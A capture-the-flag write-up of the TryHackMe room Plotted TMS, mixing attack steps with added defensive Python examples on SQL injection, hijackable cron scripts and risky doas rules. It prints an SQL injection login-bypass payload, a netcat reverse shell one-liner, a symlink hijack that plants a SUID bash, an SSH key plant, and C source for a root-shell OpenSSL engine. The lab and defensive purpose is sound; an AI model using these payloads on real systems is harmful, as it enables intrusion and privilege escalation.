“The only true wisdom is in knowing you know nothing.” - Socrates

Plotted TMS – Easy

This writeup will cover the Plotted TMS room on TryHackMe.

Summary

  • Nmap and rustscan reveal that the following ports are open:
    • 22/ssh
    • 80/http
    • 445/http
  • GoBuster finds some random files on port 80. On port 445, however, there is a /management directory.
  • Traffic Offense Management System running on port 445
  • SQLi on the login page
  • Public exploit available for RCE
  • Need to modify the exploit to make it work
  • Initial foothold by leveraging the public exploit
  • Privilege Escalation - 1
    • A script runs as plot_admin. Only plot_admin has write access to the file. However, www-data has write access to the directory that contains the script.
  • Privilege Escalation - 2
    • plot_admin can run openssl as root using doas
    • We’ll leverage this to escalate our privileges to root.
  • All Done 😀

Enumeration

  • Nmap and rustscan show that the following ports are open:
    • 22/ssh
    • 80/http
    • 445/http
  • Running GoBuster on port 80 finds multiple files containing base64-encoded text. On port 445, however, we find a directory called management.
  • Upon browsing to the directory, we are presented with the “Traffic Offense Management System”.
  • By performing simple SQLi on the username field, we can login as the administrator.
    • 1' or '1'='1';-- -
  • Browsing through the application/system, we find that it is running version 1.0 of the Traffic Offense Management System.
  • We can use this information to find any public exploits, if available.
  • searchsploit traffic offense management 1.0
  • We find that there is a SQLi to remote code exec exploit available.
  • There are multiple ways to exploit the system to gain an initial foothold. However, in this writeup we will use exploit ‘50221’.
  • searchsploit -m 50221
  • However, to make it work we need to modify line 107 (shown in the screenshot below).
    • Need to add "http://{ip}:445"+ prior to find_shell.get
  • Once modified, we can run the exploit and gain an initial foothold on the system.
    • python2 50221.py
  • Since we have a ‘PHP system’ remote code exec on the system, we will spawn a proper reverse shell using nc:
    • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/f
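Why the payload on the login page works, and what closes it, as an added example that is not part of the original writeup or of the Traffic Offense Management System code: a toy login check against an in-memory SQLite table, once built by string concatenation and once as a parameterized query. The table, user and password are constructed; only the payload is the one from the writeup.

```python
import sqlite3

# Constructed sample: one administrator row in an in-memory database.
# Passwords are stored in clear only to keep the example short; a real
# system stores a salted hash and compares against that.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn

def vulnerable_query(username, password):
    # The query text as a concatenating login builds it: user input is spliced
    # straight into the SQL, so quotes in the input change the statement.
    return ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))

def login_vulnerable(conn, username, password):
    # With username 1' or '1'='1';-- - the WHERE clause becomes
    #   username = '1' or '1'='1'
    # which is always true, and the password check is commented out, so the
    # first row (the administrator) is returned and the login succeeds.
    row = conn.execute(vulnerable_query(username, password)).fetchone()
    return row is not None

def login_safe(conn, username, password):
    # Parameterized query: the driver passes the input as data, never as SQL
    # text, so the same payload is just a username that does not exist.
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1';-- -"
    print(vulnerable_query(payload, "anything"))
    print("concatenated :", login_vulnerable(db, payload, "anything"))  # True
    print("parameterized:", login_safe(db, payload, "anything"))         # False
```

Printing the rendered query makes the mechanism visible: the single quote in the input terminates the string literal, the `or` makes the predicate true for every row, and `;-- -` turns the rest of the original statement into a comment. The parameterized version never reaches the SQL parser with that structure.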

Privilege Escalation - 1

  • Browsing through the system, we find that user.txt is inside /home/plot_admin. However, it is only readable by plot_admin.
  • Looking for ways to escalate privileges, we find that there is a job that runs as plot_admin every minute.
    • /var/www/scripts/backup.sh
  • The backup.sh file is only writable by plot_admin. However, we do have write access to the directory it is in: /var/www/scripts/
  • Therefore, we can create another script inside the same directory and make backup.sh a soft link to our script. This should allow us to escalate our privileges to plot_admin.
  • Commands:
    • cd /var/www/scripts/
    • echo "cp /bin/bash /home/plot_admin/pa_shell; chmod +xs /home/plot_admin/pa_shell" > script.sh
    • chmod +x script.sh
    • ln -sf script.sh backup.sh
    • /home/plot_admin/pa_shell -p
  • We can now add our ssh key to authorized_keys for plot_admin and ssh to the host.
    • cd /home/plot_admin
    • mkdir .ssh && chmod 0700 .ssh
    • echo "{pubkey}" > .ssh/authorized_keys
    • chmod 0600 .ssh/authorized_keys
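The condition this step relies on is a scheduled job running, as plot_admin, a script that lives in a directory www-data can write to: the file's own permissions are irrelevant once the directory entry can be replaced. As an added example, not part of the writeup, the following Python audit walks the parent directories of a scheduled script and reports anything that would let a lower-privileged user swap it out, then runs itself against a constructed temporary layout shaped like /var/www/scripts/backup.sh. The function names, the heuristics and the sample layout are mine.

```python
import os
import stat
import tempfile

def hijackable_script(script_path, stop_at="/"):
    """Return a list of findings describing how a lower-privileged user could
    swap out `script_path` before a privileged job runs it. An empty list
    means nothing was found. Heuristic: classic mode bits only; POSIX ACLs
    are not inspected."""
    findings = []
    script_path = os.path.abspath(script_path)
    st = os.lstat(script_path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("%s is a symlink to %s" % (script_path, os.readlink(script_path)))
        try:
            st = os.stat(script_path)          # attributes of the link target
        except FileNotFoundError:
            findings.append("%s is a dangling symlink" % script_path)
            return findings
    owner, group = st.st_uid, st.st_gid
    if st.st_mode & stat.S_IWOTH:
        findings.append("%s is world-writable" % script_path)
    # Every parent directory up to stop_at: write access to a directory lets a
    # user unlink or rename the script and put a replacement (or a symlink)
    # in its place, which is exactly the step taken in the writeup.
    d = os.path.dirname(script_path)
    stop_at = os.path.abspath(stop_at)
    while True:
        dst = os.stat(d)
        m = dst.st_mode
        if dst.st_uid not in (0, owner):
            findings.append("%s is owned by uid %d, not root or the script owner" % (d, dst.st_uid))
        if (m & stat.S_IWOTH) and not (m & stat.S_ISVTX):
            findings.append("%s is world-writable without the sticky bit" % d)
        elif (m & stat.S_IWGRP) and dst.st_gid not in (0, group):
            findings.append("%s is group-writable by gid %d" % (d, dst.st_gid))
        if d == stop_at or d == os.path.dirname(d):
            break
        d = os.path.dirname(d)
    return findings

def demo():
    """Build a constructed layout mimicking /var/www/scripts/backup.sh and
    return (findings with the flawed permissions, findings after the fix)."""
    root = tempfile.mkdtemp()
    scripts = os.path.join(root, "scripts")
    os.mkdir(scripts)
    backup = os.path.join(scripts, "backup.sh")
    with open(backup, "w") as fh:
        fh.write("#!/bin/sh\necho backup\n")
    os.chmod(backup, 0o755)
    os.chmod(scripts, 0o777)   # the flaw: anyone may replace directory entries
    flawed = hijackable_script(backup, stop_at=root)
    os.chmod(scripts, 0o755)   # the fix: only the owner may change the directory
    fixed = hijackable_script(backup, stop_at=root)
    return flawed, fixed

if __name__ == "__main__":
    flawed, fixed = demo()
    print("flawed:", flawed)
    print("fixed :", fixed)    # []
```

The same function can be pointed at every script referenced from crontabs, systemd timers or doas/sudo rules on a host; `stop_at` exists so the walk can be bounded for tests, and for a real audit the default of `/` is what you want.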

Privilege Escalation - 2

  • Looking for ways to escalate privileges from plot_admin, we find the following:
    • sudo -l (Password Required)
    • find / -type f -perm -u=s 2>/dev/null (Nothing Suspicious)
    • Searching for possible passwords for the user plot_admin, no luck.
    • getcap -r / 2>/dev/null (No capabilities that would allow privilege escalation)
    • /etc/doas.conf shows that plot_admin can run the openssl command as root without a password using doas
  • Since we can run openssl as root, we can leverage this to escalate privileges to root.
  • Process:
    • On the attack machine, we create a file called exploit.c with the following contents:

        /* OpenSSL dynamic engine stub. When a root-run openssl loads this
           engine, bind() is called and the shell it spawns runs as root. */
        #include <stdlib.h>          /* system() */
        #include <unistd.h>          /* setuid(), setgid() */
        #include <openssl/engine.h>

        static int bind(ENGINE *e, const char *id)
        {
          setuid(0); setgid(0);
          system("/bin/bash");
          return 1;                  /* tell OpenSSL the bind succeeded */
        }

        IMPLEMENT_DYNAMIC_BIND_FN(bind)
        IMPLEMENT_DYNAMIC_CHECK_FN()

    • Once the file is created, we need to run the following commands:
      • gcc -fPIC -o exploit.o -c exploit.c
      • gcc -shared -o exploit.so -lcrypto exploit.o
    • Once compiled, we copy the file over to the target using python, nc, etc.
    • Finally, on the target we run openssl req -engine ./exploit.so through doas.
    • All Done! 😀
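The root cause of this step is a doas rule that hands a user a code-loading binary as root, without even a password. As an added example, not from the writeup or the room, here is a small doas.conf parser that flags such rules. The grammar follows doas.conf(5); the sample configuration is constructed, and the list of code-loading commands contains only openssl, the case this box demonstrates (the `-engine` option loads an arbitrary shared object).

```python
import os
import shlex

# Commands that can be made to execute caller-supplied code when run as root.
# Only openssl is listed, since that is the case this box demonstrates.
CODE_LOADING = {"openssl"}

OPTIONS = ("nopass", "nolog", "persist", "keepenv", "setenv")

def _take(tokens, what):
    if not tokens:
        raise ValueError("missing " + what)
    return tokens.pop(0)

def parse_doas_rule(line):
    """Parse one doas.conf line into a dict; return None for blank/comment lines.
    Grammar, from doas.conf(5):
      permit|deny [options] identity [as target] [cmd command [args ...]]
    The target defaults to root when `as` is omitted."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    tokens = shlex.split(line)
    action = _take(tokens, "action")
    if action not in ("permit", "deny"):
        raise ValueError("unknown action: %s" % action)
    rule = {"action": action, "options": set(), "identity": None,
            "target": "root", "cmd": None, "args": None}
    while tokens and tokens[0] in OPTIONS:
        opt = tokens.pop(0)
        rule["options"].add(opt)
        if opt == "setenv":  # setenv { VAR=value ... }: skip the brace group
            if _take(tokens, "setenv block") != "{":
                raise ValueError("setenv needs a { ... } block")
            while _take(tokens, "closing }") != "}":
                pass
    rule["identity"] = _take(tokens, "identity")
    if tokens and tokens[0] == "as":
        tokens.pop(0)
        rule["target"] = _take(tokens, "target user")
    if tokens and tokens[0] == "cmd":
        tokens.pop(0)
        rule["cmd"] = _take(tokens, "command")
        if tokens and tokens[0] == "args":
            tokens.pop(0)
            rule["args"] = tokens   # may be empty: "args" alone means no arguments
            tokens = []
    if tokens:
        raise ValueError("unexpected tokens: %r" % tokens)
    return rule

def risky_rules(config_text):
    """Return (line_number, identity, reason) for permit rules that hand out
    root code execution: no cmd restriction at all, or a code-loading command
    with no args restriction. nopass is reported because it removes the one
    remaining hurdle."""
    found = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        rule = parse_doas_rule(line)
        if rule is None or rule["action"] != "permit" or rule["target"] != "root":
            continue
        reasons = []
        if rule["cmd"] is None:
            reasons.append("any command as root (no cmd restriction)")
        elif os.path.basename(rule["cmd"]) in CODE_LOADING and rule["args"] is None:
            reasons.append("%s can load arbitrary code (no args restriction)"
                           % os.path.basename(rule["cmd"]))
        if reasons and "nopass" in rule["options"]:
            reasons.append("without a password (nopass)")
        if reasons:
            found.append((lineno, rule["identity"], "; ".join(reasons)))
    return found

# Constructed sample configuration, not the file from the box.
SAMPLE_CONF = """\
# constructed sample doas.conf
permit persist alice as root cmd apt args update
permit nopass plot_admin as root cmd openssl
permit bob
deny carol
"""

if __name__ == "__main__":
    for lineno, who, why in risky_rules(SAMPLE_CONF):
        print("line %d: %s: %s" % (lineno, who, why))
```

Rules with an `args` clause are not flagged for openssl because doas matches the argument list exactly, so a rule pinned to, say, `args version` cannot be used to pass `-engine`. That is also the mitigation: restrict the rule to the exact invocation the user needs, or drop it.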

Hope you enjoyed reading this writeup!
Happy Hunting! 😀

Posted by: infinity
